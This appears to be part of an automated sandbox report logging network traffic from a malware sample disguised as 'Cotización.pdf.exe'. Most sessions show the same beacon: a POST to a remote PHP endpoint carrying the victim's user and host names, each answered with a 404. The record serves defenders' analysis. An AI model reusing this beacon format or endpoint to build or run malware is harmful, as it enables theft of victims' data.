                                      17192.168.2.349743172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:59.452094078 CEST1424OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:59.471790075 CEST1424OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:59.759763002 CEST1425INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lR0Ly0DhxhcX0bN5WoeYU9uDnA7yU7KGSPeYmrsISFNDOB3ARJPx%2BTVnKjwa2IffZUWYu69%2BKEYDaEk3EskdDbjWh7dVfnApAeAawutkiV8y7oyOL6OEA2w4TJqdqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26498a8f2c2ea-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      18192.168.2.349744104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:00.017564058 CEST1426OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:00.038944960 CEST1426OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:00.294830084 CEST1427INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vrye5pxQfIIFLAeHv%2BmKZPGBDkfDGhdbteMRHE4EjBHYrebR8fCh7UtkTdnAC%2BNDacQBjZ0K92rnqp%2F5Rsa2gJi%2FS1oV5t%2BK6xKMkQB2WxjZtJuvjW4cBCrmTLgaCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2649c2ba39778-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      19192.168.2.349745172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:00.573297977 CEST1428OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:00.591094017 CEST1428OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:00.839406013 CEST1429INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Eb59Rd4i%2FBTsTVvuEPHlrZQiGV%2BfPGhzT9gtdCA19XWUsOyPdLlrsdK%2BM8paXjItkvu3H5MO%2FFJiOwArPoMERmXXM%2Bvb5uALabQTHZdT2ViaRuvjITJFHIk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2649fa89c5369-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.349727104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:48.868817091 CEST1370OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:48.886526108 CEST1370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:49.149667978 CEST1371INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:49 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rD2tCCCsSu1E8%2FMSN1%2B0v%2Fxcutlo9g3dxuc30D7W6ZtmFSJZ%2BYdbXeMiCXPclhyJ7kYHmSB97Mx%2FrquGhEV8nAZq51yCUO%2FdPPPIm1UMuOWM%2FbMjC3cf4onipCxPag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264567b6b05d8-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      20192.168.2.349746104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:01.084925890 CEST1430OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:01.102716923 CEST1430OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:01.436127901 CEST1431INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:01 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cC2DG66uMmJrv1BdZkPbq3E1%2BGg4ilt%2FG7cxcJYNwNAwyerrUbth6Eu5avC%2BRf0HO9UiQZfBGntVRWGKWNXAYzKX2OJPCqkixOOxeothzqMnEP1fyJQ%2F99L8D%2Fqjow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264a2d8321f25-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      21192.168.2.349747172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:01.694096088 CEST1431OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:01.814182043 CEST1432OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:02.080519915 CEST1432INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:02 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bsBzkSv7Ivk3rQ9VZlXfNWyhBzbtSz2UrOxv8Gd%2BtcwRuudKhcbnawGCcwtYrYYjJiGhTvfY6Qmd5c0qCBvbP7m%2BXz%2FRFfkC31A2MXl3ABghaJE5CPPGvXuqZvdjjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264a6af8ad729-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      22192.168.2.349748172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:02.339421034 CEST1433OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:02.359179974 CEST1434OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:02.618393898 CEST1434INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:02 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=E2nTgQrTeQND2YXbw93nLp3JphiMRvcUIxAVFdtUzjYoQPk5MFZIGj89GrXVQXDJaajL%2FYh2DyrvKBazmMibpmz0gurLP1okeQR06ANMESQ%2Fwk6hVzJDjYM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264aabb2e05fd-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      23192.168.2.349749104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:02.980963945 CEST1435OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:02.998627901 CEST1435OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:03.448837042 CEST1436INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=OJij8etqudxRJFZC%2BDF3V357dnXR2J5c30y7IhQFmiFbd2nJLa6Wa0LJH32K7c6N3scNPPXSElMmupKVh5Q5nN%2FGv%2F13l5ETeXbPz1rYWs7KE0o7BLCcTZc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264aebe662bad-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      24192.168.2.349750104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:03.732526064 CEST1437OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:03.752901077 CEST1437OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:03.999746084 CEST1438INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=suQosiPlZuTTK9AfTwuwuYRNRy3k2fYNvkzM7h7do58WloO34AubfymRFF6WEb011z4ieNfLLzg6db38EN503MgVp0SyTbIvDXOiQuTTJgntMXsYPwfmg0hwxSSfhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264b36a0b4a73-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      25192.168.2.349751172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:04.280298948 CEST1439OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:04.298085928 CEST1439OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:04.548019886 CEST1440INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QxapigzveIm0EwoozKgPBxlGB6d9vM3K3FTmosfJTyEcw4xg6JJNX03lbK3mGyOEx116SrlpJ%2FrnAd6JShYMy0cl%2B1HGsLSwOEzZESWSvdUEnJrXybaTs4s%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264b6c8b9324c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      26192.168.2.349752104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:04.800228119 CEST1441OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:04.820697069 CEST1441OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:05.169147968 CEST1442INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VdUKPdmaXzSnYAkvwQd8%2FIff15bkXtyE%2FFjVj2xsVuKhFc14kFuxFL7qpc9sPo8qbW2nnp44iSBqgpJNjrD1ICMn9SIeHa0mHEfJzXEXEHxyB3gyx69S9Is%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264ba1dcad6d5-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      27192.168.2.349753104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:05.436605930 CEST1443OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:05.454508066 CEST1443OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:05.777416945 CEST1444INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8%2Fj7xvaENImeARs%2BnJPxxSPxrPzmmAto5Snq%2BlEezkxYQFAX6WpYZVTMMIK2V799nmTD%2Bxs0av%2FdD%2BhuGCbEqjYzAtDkUiTXURAPIzrWtQJAkt7BakSKbG2lq%2Fbz1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264be0dd0d6b9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      28192.168.2.349754172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:06.026384115 CEST1444OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:06.047815084 CEST1445OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:06.299138069 CEST1445INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8shUnKbpG0sMcgK3oV0OXoonBhRJMXNeryZcbVOChtgdO%2BaorheR6cYZVQBCDb%2B1nnffbS5W9l1naqbGWviq73AvmT9EXy%2BQBXvEluPtTaF6Qp%2Fq%2F43rh6%2F6iYSOZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264c1b882dfbf-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      29192.168.2.349755104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:06.549988031 CEST1446OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:06.567970991 CEST1447OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:06.910922050 CEST1447INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=5Cx6AnuA6ltOqjNA0SYtg35dMWELtq7XXPy7ZV%2BJpa0K1lz92qO38yrg%2FhHHD84LkTzghTitdDltXGwKTNJyxMnCezXJ4D8XUM%2B6TWh0ATU6wruxcv%2BaQoI%3D"}],"group":"cf-nel","max_age":604800}
